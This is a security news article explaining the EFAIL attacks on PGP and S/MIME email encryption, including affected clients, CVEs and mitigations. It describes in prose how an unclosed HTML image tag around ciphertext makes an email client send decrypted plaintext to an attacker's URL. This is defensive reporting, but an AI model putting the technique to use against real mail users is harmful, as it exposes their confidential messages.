Saturday, June 15, 2024

EFAIL Attacks – How PGP & S/MIME Vulnerability Leaked Encrypted Emails in Plain Text

Researchers finally revealed the Historical Email encryption based EFAIL attacks that can be exploited this brand new serious vulnerability that affected PGP & S/MIME end-to-end encryption technologies.

Researchers already released an earlier warning about this highly critical security flaw in PGP & S/MIME keys and they advised to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

Email Based encrypted medium protected using Transport layer security to perform complete confidential communication such as hostile environments which is mainly used by whistleblowers, journalists etc.

This EFAIL attacks can be used to break this additional encryption layer and anyone getting access to their email communication can also read the victims emails even if they use additional PGP encryption.

Also sometime sophisticated attackers will perform an attack called eavesdrop on email communications to steal the many people’s confidential information that is shared over email.

In this case, OpenPGP offers end-to-end encryption particularly for sensitive communication and  S/MIME is an alternative standard for email end-to-end encryption to secure the corporate environment from this powerful attacks.

This EFAIL attacks capable of exploiting this vulnerability that has been discovered in OpenPGP and S/MIME which reveal the encrypted Emails in Plain Text.

Here We can see the Affected clients by this EFAIL Attacks on S/MIME clients, PGP clients and Direct exfiltration attacks.

How Does This EFAIL Attacks Works

Initially, Attacker needs to access the encrypted emails that can be achieved by eavesdropping on network Traffic, Email based servers, compromising the Backup system, Email Accounts including the Emails that could have been collected a year ago.

According to Researchers,  “In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs.

Later attackers influence the crafted Emails from various attacks and modifying the Emails that will be sent to Victims.

The Victims Email client will start to decrypt the Email and the Email content will be exfiltrated as a Plain text if the victims configured his Email client to read the External Resources.

Understand the EFAIL Attacks

Attacker sends the modified Encrypted Email as a new multipart email with three body parts to the Victims client.

  1. HTML Body  containing an HTML image tag with open  quotes but not closed
  2. second body part contains the PGP or S/MIME ciphertext
  3. Third is an HTML body closes the src attribute of the first body part

Now Attack will send this Email to a victim then the Victim Email client will Decrypt the second body and stitches the three body parts together in one HTML email.

Here URL spans over all four lines since image tag in line 1 is closed in line 4.

According to researchers, The email client then URL encodes all non-printable characters (e.g., %20 is a whitespace) and requests an image from that URL. As the path of the URL contains the plaintext of the encrypted email, the victim’s email client sends the plaintext to the attacker.

EFAIL Attacks Mitigation

  • No decryption in email client – Decrypt S/MIME or PGP emails in a separate application outside of your email client.
  • Disable HTML rendering –  Since this attack rendering HTML images, styles, Disabling the presentation of incoming HTML emails in your email client
  • Patching – Apply the patch that released by the vendor for this EFAIL Attacks vulnerabilities.
  • Update – Update OpenPGP and S/MIME standards.

Based on the Researchers analysis 25 of the 35 tested S/MIME email clients and 10 of the 28 tested OpenPGP email clients are affected.

EFail Attacks flaw has been reported already and two official CVE number has been realised.

CVE-2017-17688: OpenPGP CFB gadget attacks
CVE-2017-17689: S/MIME CBC gadget attacks


Latest articles

Sleepy Pickle Exploit Let Attackers Exploit ML Models And Attack End-Users

Hackers are targeting, attacking, and exploiting ML models. They want to hack into these...

SolarWinds Serv-U Vulnerability Let Attackers Access sensitive files

SolarWinds released a security advisory for addressing a Directory Traversal vulnerability which allows a...

Smishing Triad Hackers Attacking Online Banking, E-Commerce AND Payment Systems Customers

Hackers often attack online banking platforms, e-commerce portals, and payment systems for illicit purposes.Resecurity...

Threat Actor Claiming Leak Of 5 Million Ecuador’s Citizen Database

A threat actor has claimed responsibility for leaking the personal data of 5 million...

Ascension Hack Caused By an Employee Who Downloaded a Malicious File

Ascension, a leading healthcare provider, has made significant strides in its investigation and recovery...

AWS Announced Malware Detection Tool For S3 Buckets

Amazon Web Services (AWS) has announced the general availability of Amazon GuardDuty Malware Protection...

Hackers Exploiting MS Office Editor Vulnerability to Deploy Keylogger

Researchers have identified a sophisticated cyberattack orchestrated by the notorious Kimsuky threat group.The...
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Free Webinar

API Vulnerability Scanning

71% of the internet traffic comes from APIs so APIs have become soft targets for hackers.Securing APIs is a simple workflow provided you find API specific vulnerabilities and protect them.In the upcoming webinar, join Vivek Gopalan, VP of Products at Indusface as he takes you through the fundamentals of API vulnerability scanning..
Key takeaways include:

  • Scan API endpoints for OWASP API Top 10 vulnerabilities
  • Perform API penetration testing for business logic vulnerabilities
  • Prioritize the most critical vulnerabilities with AcuRisQ
  • Workflow automation for this entire process

Related Articles